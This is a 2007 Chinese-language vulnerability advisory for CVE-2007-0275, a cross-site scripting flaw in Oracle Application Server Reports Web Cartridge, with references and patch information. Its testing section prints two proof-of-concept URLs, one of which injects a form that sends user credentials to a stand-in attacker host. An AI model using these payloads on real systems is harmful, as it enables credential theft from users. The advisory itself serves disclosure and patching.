发布日期：2007-01-17
更新日期：2007-01-24

受影响系统：

Oracle Application Server Release 2, 9.0.2.3

描述：

---

CVE(CAN) ID: CVE-2007-0275

Oracle应用服务器是一个综合解决方案，用于开发、集成和部署企业的应用系统、门户和网站。

Oracle应用服务Reports Web Cartridge在处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞在用户浏览器中执行恶意脚本代码。

在使用Oracle应用服务器处理Web客户端请求时，报表服务器必需Reports Web CGI或Web Cartridge。由于没有正确验证genuser参数，远程攻击者可以在输入中注入任意脚本并在客户端浏览器中执行。这一漏洞在认证表单中尤其严重，因为恶意用户可以通过这种攻击获得其他用户的认证凭据。

<*来源：Vicente Aguilera Diaz （vaguilera@isecauditors.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=116906350119011&w=2
        http://secunia.com/advisories/23794
        http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html
        http://www.us-cert.gov/cas/techalerts/TA07-017A.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>&genuser=UserName<script>alert('Vulnerable to XSS attack!');</script>
http://<oracle-server>/dev60cgi/rwcgi60?showmap&server=<oracle-reports-server>&genuser=</form><formname='AttackerForm'action='http://attacker-machine.com/credentials'>User Name

建议：

---

厂商补丁：

Oracle
------
Oracle已经为此发布了一个安全公告（cpujan2007）以及相应补丁:
cpujan2007：Oracle Critical Patch Update - January 2007
链接：http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html?_template=/o

浏览次数：3701
严重程度：0（网友投票）